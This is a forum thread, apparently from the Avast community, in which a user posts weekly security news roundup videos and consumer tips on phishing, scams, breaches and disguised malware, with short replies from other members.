(https://i.imgur.com/CQLxihSm.jpg) (https://i.imgur.com/CQLxihS.png)
https://youtu.be/fIDX8xcDpgA (https://youtu.be/fIDX8xcDpgA)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging research.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
-
Avoiding medical scams
(https://i.imgur.com/Nvg5B6gm.jpg) (https://i.imgur.com/Nvg5B6g.png)
https://youtu.be/FkWLsid4F4c (https://youtu.be/FkWLsid4F4c)
Follow these tips to recognize and avoid both
Durable Medical Equipment (DME) fraud and
Medical identity theft.
Read Grace Macej comprehensive article on this topic.
https://blog.avast.com/medical-scams (https://blog.avast.com/medical-scams)
-
Weekly Security News Roundup w/e 7-9-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/07/09/18/15/c3iQFoV0g1J/preview.jpg)
https://youtu.be/p9rQHxstNv4 (https://youtu.be/p9rQHxstNv4)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
L.S.
Weak smb1 and how it is being abused.
and there are such NSA exploits, that later come to again bite the community in the form of malcode modified by cybercriminals into rats and ransomware:
See: https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/
polonus
-
L.S.
Weak smb1 and how it is being abused.
and there are such NSA exploits, that later come to again bite the community in the form of malcode modified by cybercriminals into rats and ransomware:
See: https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/ (https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/)
polonus
Why are folks still using SMB1?
-
Most devious and effective recent black hat fraud attack:
https://www.microsoft.com/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/
More than ten thousand organizations fell victim to a phishing-attack where proxyservers are being abused to be able to circumvent 2FA. Such compromised accounts are abused to commit so-called BEC-fraud (BEC = Business Email Compromise).
One could recieve an email to listen in to a voicemail. When one opens the html-file attached one will get redirected to a phishing site. Office users are being attacked in this way. Do not fall for this fraud scheme.
MS has a survey of all domains used in this fraud. Train your awareness to see if the site is the real McCoy or not. And as allways MS asks you once and you will stay logged in for ever.
Later people are astonished as they can no longer sign on on their MS- or Google account.
Never log-in from an email that you did not initiate yourself.
Microsoft to log you out of such sessions could be a remedy.
And MS should log and check on this abused IP-addresses.
polonus
-
Weekly Security News Roundup w/e 7-15-2022
(https://i.imgur.com/7TDxqPKm.jpg) (https://i.imgur.com/7TDxqPK.png)
https://youtu.be/s6_OXSYCvJY (https://youtu.be/s6_OXSYCvJY)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Large-scale attack found on Word Press CMS with plug-in, Kaswara Modern WPBakery Page Builder add-on, leak description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24284
Developers never came up with an update and will not. Around 4 to 8 thousand websites still have this vulnerable add-on installed. Recently an exploit for this hole was run on 1,6 million Word Press websites.
Vulnerability is qualified as high - 10.0, users are being advised to remove the add-on a.s.a.p.
polonus
-
Weekly Security News Roundup w/e 7-22-2022
(https://i.imgur.com/ZSbFugUm.jpg) (https://i.imgur.com/ZSbFugU.png)
https://youtu.be/5tzBokTALe0 (https://youtu.be/5tzBokTALe0)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Weekly Security News Roundup w/e 7-29-2022
(https://i.imgur.com/hKM58Mtm.jpg) (https://i.imgur.com/hKM58Mt.png)
https://youtu.be/RtjFODhSxtc (https://youtu.be/RtjFODhSxtc)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Weekly Security News Roundup w/e 8-5-2022
(https://i.imgur.com/lxefwjQm.jpg) (https://i.imgur.com/lxefwjQ.png)
https://youtu.be/7BMIP5N1W8Y (https://youtu.be/7BMIP5N1W8Y)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Weekly Security News Roundup w/e 8-12-2022
(https://i.imgur.com/2cSiFUrm.jpg) (https://i.imgur.com/2cSiFUr.png)
https://youtu.be/FvinQskruUk (https://youtu.be/FvinQskruUk)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Six Common Internet Scams and How To Avoid Them
(https://i.imgur.com/RRc9RuUm.jpg) (https://i.imgur.com/RRc9RuU.png)
https://youtu.be/MOH_TD5_yQo (https://youtu.be/MOH_TD5_yQo)
To help ensure that you (and your mom, sister, friends, and boss)
don’t become the victim of an online scammer, here are six common types
of internet scams and how to avoid them.
My thanks to Emma McGowan for her excellent article on this topic,
https://blog.avast.com/majority-americans-targeted-scammers (https://blog.avast.com/majority-americans-targeted-scammers)
-
Weekly Security News Roundup w/e 8-19-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/19/13/07/c3jqIiVT2W5/preview.jpg)
https://youtu.be/p2p1-1WUmj0 (https://youtu.be/p2p1-1WUmj0)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Security News Flash - Apple Zero-Day Exploit
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/20/17/15/c3jYboVTbQO/preview.jpg)
https://youtu.be/PLl55Dixr0A (https://youtu.be/PLl55Dixr0A)
A serious Apple Zero-Day exploit vulnerability that needs your immediate attention.
Patch your devices NOW.
-
Twitter Accused of Cybersecurity Mismanagement
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/23/16/14/c3j0D2VTZDM/preview.jpg)
https://youtu.be/kxHFLLAD9ws (https://youtu.be/kxHFLLAD9ws)
Ex-security chief accuses Twitter of cybersecurity mismanagement.
Peiter “Mudge” Zatko has accused his former employer of
cybersecurity negligence in an explosive whistleblower complaint.
-
Plex Data Breach
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/24/11/49/c3jZXdVTO77/preview.jpg)
https://youtu.be/I0UJNZ-7gjg (https://youtu.be/I0UJNZ-7gjg)
Plex Data Breach. Change your password ASAP.
It's also advisable to set up 2FA if you haven't already done so
-
What's Vishing and How Can I Protect Myself?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/24/22/29/c3jZ3UVTupN/preview.jpg)
https://youtu.be/_zPFvHHl4tE (https://youtu.be/_zPFvHHl4tE)
Find out all about Vishing and how to protect yourself to avoid becoming a victim.
This video also explains some of the other terms in the Phishing category.
My thanks to Grace Macej for her excellent article on this topic.
You'll find it here: https://blog.avast.com/stay-protected-vishing-scams (https://blog.avast.com/stay-protected-vishing-scams)
-
LastPass was just Breached
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/25/22/43/c3jT35VTxnk/preview.jpg)
https://youtu.be/Q7VOXWeHDTY (https://youtu.be/Q7VOXWeHDTY)
LastPass, one of the most used password managers, is sending out emails
warning users that it suffered a breach.
Read more at How-To Geek - https://bit.ly/3CFYltg (https://bit.ly/3CFYltg)
-
Weekly Security News Roundup w/e 8-26-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/26/21/54/c3jOrLVTacn/preview.jpg)
https://youtu.be/iu3oAWfjBeU (https://youtu.be/iu3oAWfjBeU)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
This was an especially bad week for breaches.
-
Caution: A Google Translate Desktop App Is Malware
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/31/14/19/c3jw2qVTGGe/preview.jpg)
https://youtu.be/gq_d48L7Nhw (https://youtu.be/gq_d48L7Nhw)
A popular Desktop App turns out to be Malware. It turns itself into a Cryptominer.
-
Check Point Research detects Crypto Miner malware disguised as Google translate desktop and other legitimate applications
This allowed the campaign to successfully operate under the radar for years.
https://research.checkpoint.com/2022/check-point-research-detects-crypto-miner-malware-disguised-as-google-translate-desktop-and-other-legitimate-applications/
https://www.virustotal.com/gui/file/a10a519001914c79b5821897438a7750377d5d3050a951a620fd97b423231f01/detection
https://www.virustotal.com/gui/file/06b82ade22acd5144baa895ce9f2913a36e7e11ad8d3f3b1e68f3d2e6752324e/detection
https://www.virustotal.com/gui/file/4b3aba66ab3dc7d8dfb3d45368983ab939dc01513b36df6f3b00a5a81a0a289d/detection
https://www.virustotal.com/gui/file/572915444ac64f8c3f07d9203824ddb42081b11271d9b6906f5157074a0c3753/detection
https://www.virustotal.com/gui/file/6a1108756c1f5d7c975d457a15d008863b773fba68a393b5d137847eae828316/detection
https://www.virustotal.com/gui/file/ddbee267683032d4c6e0a4dc734324d3e0e117ecc150583bbc3a87e8a4414901/detection
-
@Pondus,
That's exactly what my video is about.
I reported this to Avast and Avast is now detecting it.
-
Weekly Security News Roundup w/e 9-2-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/02/21/35/c3QnraVTMte/preview.jpg)
https://youtu.be/qMLhqAnJGfs (https://youtu.be/qMLhqAnJGfs)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Samsung Data Breach
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/03/17/36/c3QebzVTLOr/preview.jpg)
https://youtu.be/Y5cAbeLB3ew (https://youtu.be/Y5cAbeLB3ew)
Another breach. This time it's Samsung. The information revealed includes the following:
name, contact and demographic information, date of birth, and product registration information.
-
Watch Out For Brushing Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/07/21/50/c3QirKVOeI8/preview.jpg)
https://youtu.be/FBJtnctdSuQ (https://youtu.be/FBJtnctdSuQ)
Millions of people across the US and other countries are surprised to receive packages they never ordered.
In most cases, the source is a scam called “brushing.” Watch the video to learn more.
Read the whole article by How-To Geek at: https://bit.ly/3cSDGYy (https://bit.ly/3cSDGYy)
-
Now that is interesting, a motion (not the best word) activated light for your toilet :)
-
Now that is interesting, a motion (not the best word) activated light for your toilet :)
It's only on when you're sitting and shixxxng.
-
Weekly Security News Roundup w e 9-9-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/10/16/20/c3Q6DYVO65A/preview.jpg)
https://youtu.be/xUPMP4eXCK0 (https://youtu.be/xUPMP4eXCK0)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
What Is Email Spoofing
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/10/22/08/c3Q63jVOXeS/preview.jpg)
https://youtu.be/F5kMpVhQD5Y (https://youtu.be/F5kMpVhQD5Y)
What Is Email Spoofing,
and How Can You Protect Yourself?
-
The same spoofing goes on in Text messages to your phone.
Only two days ago I got a spoofed text supposedly from the British NHS (National Health Service), this scam.spoof text plays on the Covid fear. The gist of the message says someone you have been in contact with has covid and invites you to click on a link to get a free test kit.
This link isn't the real NHS site but purports to be from national-health-service.com, this is fake (detected on VirusTotal) and Avast would actually alert if you clicked it as the redirected url is on the virus definitions.
I knew it was a fake right from the start from the link as I hadn't signed up to the track and trace system (which is trying to emulate/look like). So I contacted my local doctors surgery to report it, in the hope the real NHS could get it shut down.
-
@David R,
I hope you have better luck that I.
All the ones I've reported are still alive and stealing other peoples money.
-
@David R,
I hope you have better luck that I.
All the ones I've reported are still alive and stealing other peoples money.
In all honesty, the receptionist didn't appear to be overly interested. She said some others had reported it, but she didn't even write down the url (I showed here the text on my phone). So no way to say if it is/was the same domain. When I asked if they had a computer tech/IT guy I got the distinct impression they didn't. So I'm not holding my breath.
-
@DavidR. In UK you should simply report Smishing to 7726.
-
@DavidR. In UK you should simply report Smishing to 7726.
I have little confidence in this either. As it requires that you forward the text, this would also give information on the recipient. By now you have got the message that I'm a trusting sort (NOT) ;)
EDIT: Also having visited the ofcom website it is a rather long winded process.
-
Avast News Companion
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/13/13/43/c3QII5VObHa/preview.jpg)
https://youtu.be/jefDwaGtpOY (https://youtu.be/jefDwaGtpOY)
Don’t be fooled by fake news sources. Quickly check media source bias and factual reporting on supported sites.
Available for the Avast Secure Browser and all other Chromium based Browsers.
https://platform.avast.com/innovation/news-companion (https://platform.avast.com/innovation/news-companion)
-
What Is Phishing, and How Do You Avoid It
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/13/21/22/c3QIr3VOqlv/preview.jpg)
https://youtu.be/-DHOGngwyz0 (https://youtu.be/-DHOGngwyz0)
Phishing attacks are more common than ever before, and they regularly lead to fraud,
identity theft, and corporate data breaches. But what is phishing, and how can you avoid it?
My thanks to Andrew Heinzman (https://www.reviewgeek.com/author/andrewheinzman/) for his excellent article on this topic published in Reviewgeek,
https://bit.ly/3xkFMHM (https://bit.ly/3xkFMHM) which inspired this video.
-
Weekly Security News Roundup WE 9-16-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/17/14/05/c3Qb2hVOvT5/preview.jpg)
https://youtu.be/JQqbHtVv68Q (https://youtu.be/JQqbHtVv68Q)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
L.S.
N.B. All you type into your chomium type browser and Edge browser (for instance via spellcheck and via GBoard on Android) could land at Google and Microsoft (yep, also your passwords and other strictly personal information could land on their servers).
Such problem, as found by Otto-js, is existing for Office 365, Alibaba Cloud, Google Cloud, Amazon Web Services and LastPass. Amazon and LastPass decided to take immediate measures after being informed of that particular data hole. It is advisable for you to set spellcheck in your browser settings to false (inside the three dots menu you find at the right hand corner of your browser).
Yes folks. 'Extra super-smart does not always stand for ''extra super-secure'. This posting was written inside Avast Secure Browser-beta, that is being tested by yours truly,
Greets from me to ye all,
polonus
-
Has Your Medical Device Been Hacked
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/20/11/50/c3QYXKVOA0p/preview.jpg)
https://youtu.be/5pIA_tKRJg0 (https://youtu.be/5pIA_tKRJg0)
Roughly a third of all connected devices have insecure defaults,
such as no or weak password protection or poor software design,
that make them ripe for exploits.
My thanks to David Strom, ( https://blog.avast.com/author/david-strom (https://blog.avast.com/author/david-strom) )
for his excellent article on this topic. You can read the whole article here:
https://blog.avast.com/hacked-medical-devices (https://blog.avast.com/hacked-medical-devices)
-
Is free Wi-Fi safe?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/21/19/38/c3QrqBVOCrx/preview.jpg)
https://youtu.be/W8ygs0hDtz8 (https://youtu.be/W8ygs0hDtz8)
You need to know this before you hook into that free Wi-Fi
and get more than you bargained for.
My thanks to Emma McGowan for her article which inspired this video.
You’ll find her article at the link listed: https://blog.avast.com/is-free-wi-fi-really-safe-avast (https://blog.avast.com/is-free-wi-fi-really-safe-avast)
Avast One Essential - https://www.avast.com/en-us/index-t2#pc (https://www.avast.com/en-us/index-t2#pc)
-
One Attacker - Two Victims
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/22/21/35/c3Q3raVOmVd/preview.jpg)
https://youtu.be/nMBoPFLX7E8 (https://youtu.be/nMBoPFLX7E8)
The Lapsus$ gang seems to be behind both Uber and Rockstar Games breaches.
Both hacks show that social engineering works, and threat actors don't even go
through too much trouble using automated attack tools.
This video was inspired by an article in Cybernews: https://bit.ly/3UtkOR0 (https://bit.ly/3UtkOR0)
-
Weekly Security News Roundup w/e 9-23-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/23/19/54/c3Q0qLVOJRD/preview.jpg)
https://youtu.be/aHF-Fxl19MU (https://youtu.be/aHF-Fxl19MU)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Netiquette: Is it OK to share pictures of someone else's kids online?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/24/15/57/c3QZoPVOK6F/preview.jpg)
https://youtu.be/Y_OstT4vunA (https://youtu.be/Y_OstT4vunA)
Here’s a question a concerned parent asked Avast:
“Dear Avast, I recently hosted a birthday party for my child.
I want to post the photos on social media, but I'm not sure if it's OK
to post pictures of my kid's friends online. What should I do?”
Avast was happy to share the correct Netiquette that should be used
any time you share someone else’s photo online. This is especially important
when the photo is of a minor child.
You can read the whole article on this topic by Emma McGowan
on the Avast Blog: https://bit.ly/3xQi8mO (https://bit.ly/3xQi8mO)
-
What is social engineering
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/26/12/49/c3QOldVOM80/preview.jpg)
https://youtu.be/y95TU8QKtjY (https://youtu.be/y95TU8QKtjY)
Knowing how it works can help prevent you from becoming a victim.
My thanks to Emma McGowan for her article on this topic.
https://blog.avast.com/scammers-pose-friend (https://blog.avast.com/scammers-pose-friend)
-
Spotify - Unauthorized install on Windows 10 and 11
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/29/20/09/c3QUYQVtfnV/preview.jpg)
https://youtu.be/WgF1Kmfcjz0 (https://youtu.be/WgF1Kmfcjz0)
On 9-22-2022 Spotify was installed on my Windows 11 system without my knowledge or consent.
According to an article in Windows Latest, I wasn't alone. - https://bit.ly/3y3OeLN (https://bit.ly/3y3OeLN)
Check your system to make sure this didn't happen to you. Let me know if it did.
-
Spotify - Unauthorized install on Windows 10 and 11
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/29/20/09/c3QUYQVtfnV/preview.jpg)
https://youtu.be/WgF1Kmfcjz0 (https://youtu.be/WgF1Kmfcjz0)
On 9-22-2022 Spotify was installed on my Windows 11 system without my knowledge or consent.
According to an article in Windows Latest, I wasn't alone. - https://bit.ly/3y3OeLN (https://bit.ly/3y3OeLN)
Check your system to make sure this didn't happen to you. Let me know if it did.
Interesting:
I never had any intention of creating a Microsoft Account, only a local account that I have to use a user name and password.
So I checked out Programs and Features on my Win10 laptop and low and behold I now have 'Microsoft Store' App dated 25/09/2022 - looks like that was installed. Worse still I can't uninstall it/them. I also got bloody Microsoft Edge Dated 27/09/2022. I also noticed other MS cr4p installed 11/08/2022 Microsoft Photos.
Fortunately no Spotify (so far).
-
Uninstalling the Microsoft Store app is not supported,
and uninstalling it may cause unintended consequences.
There is no supported workaround to uninstall or reinstall Microsoft Store.
Sorry, something are difficult, others are impossible.
-
Weekly Security News Roundup w e 9-30-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/02/22/43/c36n35Vt64F/preview.jpg)
https://youtu.be/gbQcbP5aGBY
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Ransomware gang leaks data stolen from LAUSD school system
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/04/12/57/c36flPVtDjm/preview.jpg)
https://youtu.be/Cjuy7fWV-TE (https://youtu.be/Cjuy7fWV-TE)
Data of Students and Faculty stolen in a recent data breach has been released to the Dark Web.
affected persons can call the hotline set up at 855-926-1129.
-
BeReal – Not Really
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/07/21/16/c36irDVttPZ/preview.jpg)
https://youtu.be/vFr3vMahIBM (https://youtu.be/vFr3vMahIBM)
The social network’s aim is to allow people to share unfiltered moments of their lives.
The potential danger comes when those unfiltered moments include information they’d rather not share.
My thanks to Emma McGowan for her excellent article on this topic which prompted this video.
Read her article at https://blog.avast.com/bereal-safety (https://blog.avast.com/bereal-safety)
-
Weekly Security News Roundup w/e 10-7-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/07/23/19/c36i0qVtu1e/preview.jpg)
https://youtu.be/LbCLcO-XUmk (https://youtu.be/LbCLcO-XUmk)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
The IRS warns smishing attacks are on the rise
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/15/11/21/c36oXrVtJNy/preview.jpg)
https://youtu.be/qCNOvWVAPl4 (https://youtu.be/qCNOvWVAPl4)
The IRS said the attacks have increased exponentially, especially texts that appear to be coming
from the taxing agency.
My thanks go to David Strom for his excellent which inspired this video.
To read the article just follow the link: https://blog.avast.com/irs-smishing-attacks (https://blog.avast.com/irs-smishing-attacks)
-
Weekly Security News Roundup w/e 10-14-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/15/14/08/c36o2jVtdVj/preview.jpg)
https://youtu.be/l39Klvtk2l8 (https://youtu.be/l39Klvtk2l8)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
-
Cryptojacking is back in the news – and it’s increasing
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/16/17/30/c36DbvVtKv1/preview.jpg)
https://youtu.be/rk-pCEMM5GM (https://youtu.be/rk-pCEMM5GM)
The use of cryptojacking attacks is once again in the news and in favor for online attacks.
This form of attack uses malware to insert specialized and hidden “mining” apps to create new coins for the attackers.
David Strom’s excellent article available here, https://bit.ly/3EIfMdW (https://bit.ly/3EIfMdW) inspired this video.
-
Car Insurance Tracking Devices - Good or Bad?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/18/20/46/c36FYmVtPLL/preview.jpg)
https://youtu.be/hzmeYlezFmw (https://youtu.be/hzmeYlezFmw)
These days, car insurance tracking devices are available from most insurance companies,
but what are they, and how do they work? Will you be comfortable sharing all the information collected?
My thanks to Cory Gunther whose article inspired this video.
You’ll find the article at the link listed here: https://bit.ly/3S9vstS (https://bit.ly/3S9vstS)
-
Weekly Security News Roundup w/e 10-21-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/21/12/41/c36rlpVuhev/preview.jpg)
https://youtu.be/6oj_PD6nJXo (https://youtu.be/6oj_PD6nJXo)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
What happens to your Facebook account when you pass away?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/25/19/54/c36TqLVuoCS/preview.jpg)
https://youtu.be/Lzo1OuCqQYs (https://youtu.be/Lzo1OuCqQYs)
What will happen with all that data when we pass away?
Discussing your digital legacy isn't pleasant, but it’s an important part of our reality.
Don't leave it up to your family member, friends, or even worse: Facebook itself.
My thanks to Julia Szymanska for her excellent article on the topic.
which was the inspiration for this video. You’ll find her article here: https://bit.ly/3FgIR0i (https://bit.ly/3FgIR0i)
-
Weekly Security News Roundup w/e 10-28-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/28/15/26/c36uoOVuT1l/preview.jpg)
https://youtu.be/bYDoeIYslPw (https://youtu.be/bYDoeIYslPw)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes
-
Phishing: The tip of the iceberg
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/10/29/16/02/c36UDnVute7/preview.jpg)
https://youtu.be/qB09AreoUJ8 (https://youtu.be/qB09AreoUJ8)
From big companies to individuals, phishing affects everyone in today's digital world.
My thanks to Luis Corrons for his article on this topic and the information for this video.
https://blog.avast.com/phishing-tip-iceberg (https://blog.avast.com/phishing-tip-iceberg)
-
What to do if you've been hacked
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/03/19/43/c3Xeq5VupdT/preview.jpg)
https://youtu.be/WQgLaOU5h_g (https://youtu.be/WQgLaOU5h_g)
It can feel embarrassing to be the victim of a crime but, remember: You’re not alone.
Nowadays it’s a very common occurrence.
My thanks to Emma McGowan for her information on this topic and the inspiration for this video.
Follow the link to read her article. https://blog.avast.com/emergency-plan-what-to-do-hacked (https://blog.avast.com/emergency-plan-what-to-do-hacked)
You can reach the FTC to report a crime at the following link:
https://www.justice.gov/criminal-fraud/report-fraud (https://www.justice.gov/criminal-fraud/report-fraud)
-
Avast - Energy Scams Are Increasing
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/04/13/39/c3XfIgVuEnF/preview.jpg)
https://youtu.be/uGu5flWKuzo (https://youtu.be/uGu5flWKuzo)
A message from Avast (https://www.avast.com/en-us/index#pc) about the current Energy price hikes and the associated increase
in scams associated with this topic.
-
Weekly Security News Roundup w/e 11-4-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/05/22/19/c3Xh3qVum5E/preview.jpg)
https://youtu.be/OWsgaT0lgeY (https://youtu.be/OWsgaT0lgeY)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Some 15.000 Word-Press websites have malicious code to redirect visitors:
Re: https://blog.sucuri.net/2022/11/massive-ois-is-black-hat-redirect-malware-campaign.html
Also the problem of Hostwinds ignoring abuse.
polonus
-
Weekly Security News Roundup w/e 11-11-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/12/16/00/c3XlDcVUeW3/preview.jpg)
https://youtu.be/xia8-Yc_o9Y (https://youtu.be/xia8-Yc_o9Y)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Someone is spying on you
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/23/13/08/c3X0IjVU4IT/preview.jpg)
https://youtu.be/t-qr0FyECJY (https://youtu.be/t-qr0FyECJY)
Someone is almost certainly spying on you.
My thanks go to Emma McGowan for her article and the inspiration for this video.
Follow the link to read it: https://blog.avast.com/someone-is-spying-on-you-avast (https://blog.avast.com/someone-is-spying-on-you-avast)
-
Weekly Security News Roundup w/e 11-25-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/11/26/14/55/c3XO2NVUp2u/preview.jpg)
https://youtu.be/CoVUjOG9Z_A (https://youtu.be/CoVUjOG9Z_A)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup w/e 12-2-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/02/19/43/c3lnq5VUSqh/preview.jpg)
https://youtu.be/V97xyAII_sk (https://youtu.be/V97xyAII_sk)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
This may look nice. It may be tempting but, it's just another Phishing Email
[/size]that made it past the Gmail spam filter. [/color]
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/04/18/45/c3lfFGVvcSV/preview.jpg)
-
Order Scams are Increasing for the Holiday Season
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/05/22/23/c3lh30Vvfsr/preview.jpg)
https://youtu.be/6POP4n6ms_8 (https://youtu.be/6POP4n6ms_8)
Some timely advice from Avast about the fake order scams that are rampant
during the holiday season. https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
-
Holiday Season - Scam Season
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/08/19/52/c3ljqsVvoic/preview.jpg)
https://youtu.be/BgXZMQvcTfU (https://youtu.be/BgXZMQvcTfU)
Here are 9 online scams to watch out for this holiday season.
My thanks to Emma McGowan for her article on this topic
and the inspiration for this video. You'll find her article here:
https://blog.avast.com/online-holiday-scams (https://blog.avast.com/online-holiday-scams)
-
3 Major Cybersecurity Predictions for 2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/09/22/46/c3lQ3mVvFKV/preview.jpg)
https://youtu.be/GcG6baCh4GM (https://youtu.be/GcG6baCh4GM)
This year, Avast has three major predictions for 2023.
My thanks to Emma McGowan for her article on this topic which was the inspiration for this video.
You’ll find her article on the Avast blog at: https://blog.avast.com/2023-predictions (https://blog.avast.com/2023-predictions)
-
Weekly Security News Roundup w/e 12-9-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/10/17/34/c3l6b4Vvq7x/preview.jpg)
https://youtu.be/LMKfyndeapQ (https://youtu.be/LMKfyndeapQ)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Hey Google - This needs fixing
